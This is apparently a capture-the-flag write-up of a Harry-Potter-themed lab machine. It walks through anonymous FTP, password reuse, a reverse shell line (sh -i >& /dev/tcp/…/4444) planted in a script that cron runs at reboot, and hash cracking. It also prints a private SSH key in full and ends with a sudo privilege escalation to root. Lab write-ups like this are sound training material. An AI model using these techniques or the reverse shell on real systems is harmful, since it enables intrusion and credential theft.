Yer a Wizard

IP Address
10.10.248.10

$> nmap -vv 10.10.248.10 -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2024-05-22 10:05 BST
Initiating ARP Ping Scan at 10:05
Scanning 10.10.248.10 [1 port]
Completed ARP Ping Scan at 10:05, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:05
Completed Parallel DNS resolution of 1 host. at 10:05, 0.01s elapsed
Initiating SYN Stealth Scan at 10:05
Scanning ip-10-10-248-10.eu-west-1.compute.internal (10.10.248.10) [65535 ports]
Discovered open port 22/tcp on 10.10.248.10
Discovered open port 21/tcp on 10.10.248.10
Increasing send delay for 10.10.248.10 from 0 to 5 due to max_successful_tryno increase to 4

port 22 : SSH
port 21 : FTP

$> ftp 10.10.248.10
Connected to 10.10.248.10.
220 (vsFTPd 3.0.3)
Name (10.10.248.10:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        113          4096 Jan 24  2022 .
drwxr-xr-x    3 0        113          4096 Jan 24  2022 ..
drwxr-xr-x    2 0        0            4096 Jan 24  2022 ...
-rw-r--r--    1 0        0              81 Jan 24  2022 .hidden
226 Directory send OK.
ftp> get .hidden
local: .hidden remote: .hidden
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .hidden (81 bytes).
226 Transfer complete.
81 bytes received in 0.00 secs (99.8757 kB/s)

$> cat .hidden 
I swear that my password is Il0veTheMalefoys, trust me, I'm Hagrid, I never lie!

en se connectant avec filezilla, on trouve:

$> cat .reallyHidden 
FINE! My password is IAlreadySaidTooMuch

$> ssh hagrid@10.10.161.232
hagrid@10.10.161.232's password: 
(IAlreadySaidTooMuch)
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

hagrid@hogwarts:~$ ls
hut.sh  user.txt
hagrid@hogwarts:~$ cat user.txt
VWxaQ1NtVjZRblZOTVRseVdWVTFabUpxVGpKTk1VcG1ZVWRHVjAweE9IcGlha0pXVDFWb1prNVVRa1JUZWtvNVEyYzlQUT09

utilisation de CyberChef
decode avec 3x base 64:
VWxaQ1NtVjZRblZOTVRseVdWVTFabUpxVGpKTk1VcG1ZVWRHVjAweE9IcGlha0pXVDFWb1prNVVRa1JUZWtvNVEyYzlQUT09
-> UlZCSmV6QnVNMTlyWVU1ZmJqTjJNMUpmYUdGV00xOHpiakJWT1VoZk5UQkRTeko5Q2c9PQ==
-> RVBJezBuM19rYU5fbjN2M1JfaGFWM18zbjBVOUhfNTBDSzJ9Cg==
-> EPI{0n3_kaN_n3v3R_haV3_3n0U9H_50CK2}

hagrid@hogwarts:~$ cat hut.sh 
#!/bin/bash

echo "Yer a wizard!"

hagrid@hogwarts:~$ sudo -l
Matching Defaults entries for hagrid on hogwarts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hagrid may run the following commands on hogwarts:
    (root) NOPASSWD: /sbin/reboot

cat hut.sh
sh -i >& /dev/tcp/10.10.225.32/4444 0>&1

hagrid@hogwarts:~$ sudo -l
Matching Defaults entries for hagrid on hogwarts:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hagrid may run the following commands on hogwarts:
    (root) NOPASSWD: /sbin/reboot



# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user    command
17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
@reboot ron bash /home/hagrid/hut.sh



hagrid@hogwarts:~$ sudo /sbin/reboot
Connection to 10.10.66.120 closed by remote host.
Connection to 10.10.66.120 closed.

nc -lvnp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.66.120 39444 received!
bash: cannot set terminal process group (877): Inappropriate ioctl for device
bash: no job control in this shell
ron@hogwarts:~$ ls
ls
dumbledore.txt
ron@hogwarts:~$ 

cat dumbledore.txt
cat dumbledore.txt
e1f22cea2a1c41f047b36b505a6aede84a848209c69505ac17ffdaebd7ba63c98e69f68f755134d7b94d47d0c86c1aea72f39fa4e89457cf8b25f19cd1b2dd33
3984d0b5033258950d886bc760a867399e57d8cc396c74beeaefc51168ccc7d11369e882d2e591619c42192102d550fdebb59db528f88bb46cc1a33a30b0ec0a
1f4be9bd3c61e621ef43bb2e0a2d7836786f730e4e0e6aa546899bceab0571904dfc6efc94c1324b1a22ae446f0a995b533054b1dbd09d0cda03e0985786d59a
c9f4875d9269814e2ddf825ce769cb77702034225818d8cad8d46c6483693fa28b8d4e3e053d1facbd774b1fc5a2b4cc31ef41a1129e58fc149d383dc2f1b647
e75baca2466b6805bdcfc52a12160ffaaf05677dd947c5b3019710d43ea18010fcb6c9ec0cde94efcb23a68bf9c7595798e77f4ff0602f468377d15392465b69
de6bcbd90ff00c604a836fe2a0959c6a86aeabd440d8982970613edff3cd27996cd4a21c005e4dd4dca89c9a5d7a46fa9d97d2b220521dddf3b376fd04f2d0ba
7afc42427607f5171b9db17b38c3953ad5e614955cedbba9cfb97a276f3f3bd83fcfe61bdbfc799ca83865e446f3ae47998a624fd7316e7e56f7b27c9d67f150
263adce0f04ee1eb3e75528ed5251724906bdd44c4265a1cd1185af010a4561e153833d1ea46df69764f2ece8e33199f8d787bf39cc51ebb406f15480c7e780e
7f5a8bf8b1779e4802c8e86dd1ea8e096be633d64eb8b5610ae9267af670734de1bf740427d05d454f5d4080aedf2b0821c1f338cd507e9b0dc9a0145bbff303
806b977f3edfeda024f63584cc232c7b53ca0bba09cf9818346070f6489e775232f19d33390a78ba14f301a41a0c6994c2f7d95be6f6faeff9243f8e38c131f7
1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f5302860c652bf08d560252aa5e74210546f369fbbbce8c12cfc7957b2652fe9a75
c9f4875d9269814e2ddf825ce769cb77702034225818d8cad8d46c6483693fa28b8d4e3e053d1facbd774b1fc5a2b4cc31ef41a1129e58fc149d383dc2f1b647
b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86
496e20666163742c2074686973207761732073696d706c652c207472756c792c207468652070617373776f72642069732042794d65726c696e4265617264210a


crackstation

Hash	Type	Result

e1f22cea2a1c41f047b36b505a6aede84a848209c69505ac17ffdaebd7ba63c9
8e69f68f755134d7b94d47d0c86c1aea72f39fa4e89457cf8b25f19cd1b2dd33	sha512	peek

3984d0b5033258950d886bc760a867399e57d8cc396c74beeaefc51168ccc7d1
1369e882d2e591619c42192102d550fdebb59db528f88bb46cc1a33a30b0ec0a	sha512	into

1f4be9bd3c61e621ef43bb2e0a2d7836786f730e4e0e6aa546899bceab057190
4dfc6efc94c1324b1a22ae446f0a995b533054b1dbd09d0cda03e0985786d59a	sha512	this

c9f4875d9269814e2ddf825ce769cb77702034225818d8cad8d46c6483693fa2
8b8d4e3e053d1facbd774b1fc5a2b4cc31ef41a1129e58fc149d383dc2f1b647	sha512	fine

e75baca2466b6805bdcfc52a12160ffaaf05677dd947c5b3019710d43ea18010
fcb6c9ec0cde94efcb23a68bf9c7595798e77f4ff0602f468377d15392465b69	sha512	list

de6bcbd90ff00c604a836fe2a0959c6a86aeabd440d8982970613edff3cd2799
6cd4a21c005e4dd4dca89c9a5d7a46fa9d97d2b220521dddf3b376fd04f2d0ba	sha512	and

7afc42427607f5171b9db17b38c3953ad5e614955cedbba9cfb97a276f3f3bd8
3fcfe61bdbfc799ca83865e446f3ae47998a624fd7316e7e56f7b27c9d67f150	sha512	maybe

263adce0f04ee1eb3e75528ed5251724906bdd44c4265a1cd1185af010a4561e
153833d1ea46df69764f2ece8e33199f8d787bf39cc51ebb406f15480c7e780e	sha512	you

7f5a8bf8b1779e4802c8e86dd1ea8e096be633d64eb8b5610ae9267af670734d
e1bf740427d05d454f5d4080aedf2b0821c1f338cd507e9b0dc9a0145bbff303	sha512	will

806b977f3edfeda024f63584cc232c7b53ca0bba09cf9818346070f6489e7752
32f19d33390a78ba14f301a41a0c6994c2f7d95be6f6faeff9243f8e38c131f7	sha512	find

1f40fc92da241694750979ee6cf582f2d5d7d28e18335de05abc54d0560e0f53
02860c652bf08d560252aa5e74210546f369fbbbce8c12cfc7957b2652fe9a75	sha512	a

c9f4875d9269814e2ddf825ce769cb77702034225818d8cad8d46c6483693fa2
8b8d4e3e053d1facbd774b1fc5a2b4cc31ef41a1129e58fc149d383dc2f1b647	sha512	fine

b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb9
80b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86	sha512	password

496e20666163742c2074686973207761732073696d706c652c207472756c792c
207468652070617373776f72642069732042794d65726c696e4265617264210a	Unknown	Not found.

CyberChef
496e20666163742c2074686973207761732073696d706c652c207472756c792c
207468652070617373776f72642069732042794d65726c696e4265617264210a

from hex:
In fact, this was simple, truly, the password is ByMerlinBeard!


ssh hagrid@10.10.66.120
hagrid@10.10.66.120's password: 
Last login: Wed Jun 12 08:33:17 2024 from 10.10.225.32
hagrid@hogwarts:~$ su dumbledore
Password: 
dumbledore@hogwarts:/home/hagrid$ ls
hut.sh  user.txt
dumbledore@hogwarts:/home/hagrid$ cd /home
dumbledore@hogwarts:/home$ ls
dumbledore  hagrid  harry  hermione  ron
dumbledore@hogwarts:/home$ cd dumbledore
dumbledore@hogwarts:~$ ls
note.txt
dumbledore@hogwarts:~$ cat note.txt 
Help will always be given at Hogwarts to those who ask for it.

Truth be told, I will always have an eye on you Harry, I can see it all.

python3 -m http.server

wget 10.10.109.48:8000/note.txt
--2024-06-12 17:10:14--  http://10.10.109.48:8000/note.txt
Connecting to 10.10.109.48:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 137 [text/plain]
Saving to: ‘note.txt’

note.txt            100%[===================>]     137  --.-KB/s    in 0.001s  

2024-06-12 17:10:14 (179 KB/s) - ‘note.txt’ saved [137/137]

dumbledore@hogwarts:~$ cat /home/harry/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpgIBAAKCAQEAxmPncAXisNjbU2xizft4aYPqmfXm1735FPlGf4j9ExZhlmmD
NIRchPaFUqJXQZi5ryQH6YxZP5IIJXENK+a4WoRDyPoyGK/63rXTn/IWWKQka9tQ
2xrdnyxdwbtiKP1L4bq/4vU3OUcA+aYHxqhyq39arpeceHVit+jVPriHiCA73k7g
HCgpkwWczNa5MMGo+1Cg4ifzffv4uhPkxBLLl3f4rBf84RmuKEEy6bYZ+/WOEgHl
fks5ngFniW7x2R3vyq7xyDrwiXEjfW4yYe+kLiGZyyk1ia7HGhNKpIRufPdJdT+r
NGrjYFLjhzeWYBmHx7JkhkEUFIVx6ZV1y+gihQIDAQABAoIBAQDAhIA5kCyMqtQj
X2F+O9J8qjvFzf+GSl7lAIVuC5Ryqlxm5tsg4nUZvlRgfRMpn7hJAjD/bWfKLb7j
/pHmkU1C4WkaJdjpZhSPfGjxpK4UtKx3Uetjw+1eomIVNu6pkivJ0DyXVJiTZ5jF
ql2PZTVpwPtRw+RebKMwjqwo4k77Q30r8Kxr4UfX2hLHtHT8tsjqBUWrb/jlMHQO
zmU73tuPVQSESgeUP2jOlv7q5toEYieoA+7ULpGDwDn8PxQjCF/2QUa2jFalixsK
WfEcmTnIQDyOFWCbmgOvik4Lzk/rDGn9VjcYFxOpuj3XH2l8QDQ+GO+5BBg38+aJ
cUINwh4BAoGBAPdctuVRoAkFpyEofZxQFqPqw3LZyviKena/HyWLxXWHxG6ji7aW
DmtVXjjQOwcjOLuDkT4QQvCJVrGbdBVGOFLoWZzLpYGJchxmlR+RHCb40pZjBgr5
8bjJlQcp6pplBRCF/OsG5ugpCiJsS6uA6CWWXe6WC7r7V94r5wzzJpWBAoGBAM1R
aCg1/2UxIOqxtAfQ+WDxqQQuq3szvrhep22McIUe83dh+hUibaPqR1nYy1sAAhgy
wJohLchlq4E1LhUmTZZquBwviU73fNRbID5pfn4LKL6/yiF/GWd+Zv+t9n9DDWKi
WgT9aG7N+TP/yimYniR2ePu/xKIjWX/uSs3rSLcFAoGBAOxvcFpM5Pz6rD8jZrzs
SFexY9P5nOpn4ppyICFRMhIfDYD7TeXeFDY/yOnhDyrJXcbOARwjivhDLdxhzFkx
X1DPyif292GTsMC4xL0BhLkziIY6bGI9efC4rXvFcvrUqDyc9ZzoYflykL9KaCGr
+zlCOtJ8FQZKjDhOGnDkUPMBAoGBAMrVaXiQH8bwSfyRobE3GaZUFw0yreYAsKGj
oPPwkhhxA0UlXdITOQ1+HQ79xagY0fjl6rBZpska59u1ldj/BhdbRpdRvuxsQr3n
aGs//N64V4BaKG3/CjHcBhUA30vKCicvDI9xaQJOKardP/Ln+xM6lzrdsHwdQAXK
e8wCbMuhAoGBAOKy5OnaHwB8PcFcX68srFLX4W20NN6cFp12cU2QJy2MLGoFYBpa
dLnK/rW4O0JxgqIV69MjDsfRn1gZNhTTAyNnRMH1U7kUfPUB2ZXCmnCGLhAGEbY9
k6ywCnCtTz2/sNEgNcx9/iZW+yVEm/4s9eonVimF+u19HJFOPJsAYxx0
-----END RSA PRIVATE KEY-----
dumbledore@hogwarts:~$ cat /home/harry/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGY+dwBeKw2NtTbGLN+3hpg+qZ9ebXvfkU+UZ/iP0TFmGWaYM0hFyE9oVSoldBmLmvJAfpjFk/kgglcQ0r5rhahEPI+jIYr/retdOf8hZYpCRr21DbGt2fLF3Bu2Io/Uvhur/i9Tc5RwD5pgfGqHKrf1qul5x4dWK36NU+uIeIIDveTuAcKCmTBZzM1rkwwaj7UKDiJ/N9+/i6E+TEEsuXd/isF/zhGa4oQTLpthn79Y4SAeV+SzmeAWeJbvHZHe/KrvHIOvCJcSN9bjJh76QuIZnLKTWJrscaE0qkhG5890l1P6s0auNgUuOHN5ZgGYfHsmSGQRQUhXHplXXL6CKF alice@looking-glass

dumbledore@hogwarts:/home/hagrid$ ssh -i /home/harry/.ssh/id_rsa harry@hogwarts

loic@fedora:~$ touch linpeas.sh
loic@fedora:~$ nano linpeas.sh 
loic@fedora:~$ sudo python3 -m http.server 5555
[sudo] password for loic: 
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...
10.10.109.48 - - [12/Jun/2024 17:28:28] "GET /linpeas.sh HTTP/1.1" 200 -

harry@hogwarts:~$ wget http://10.21.7.245:5555/linpeas.sh
--2024-06-12 15:28:28--  http://10.21.7.245:5555/linpeas.sh
Connecting to 10.21.7.245:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847924 (828K) [application/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 828.05K  4.02MB/s    in 0.2s    

2024-06-12 15:28:28 (4.02 MB/s) - ‘linpeas.sh’ saved [847924/847924]

harry@hogwarts:~$ ls
linpeas.sh
harry@hogwarts:~$ chmod +x linpeas.sh 
harry@hogwarts:~$ ./linpeas.sh 

RED/YELLOW: 95% a PE vector

https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Sudoers file: /etc/sudoers.d/harry is readable
harry strawgoh = (root) NOPASSWD: /bin/bash

harry@hogwarts:~$ sudo -h strawgoh /bin/bash
sudo: unable to resolve host strawgoh
root@hogwarts:~# cd /root/
root@hogwarts:/root# ls
root.txt
root@hogwarts:/root# cat root.txt 
53565a4a52564d324d315648546b56474e6a564455303957533064525746705353314a5156454e4f537a6448556c425555553161565539574d6b5244576c4e57536c4a5156456b7a5530564d4e544a45527a5255553064464e45565a5454493354314a5652454d7a556c705156555a425054303950513d3d

CyberChef:
hex -> base64 -> base32 :
EPI{t3H_tRuTh_1T_15_4_834ut1fUL_4nD_t3rr18L3_th1n9}
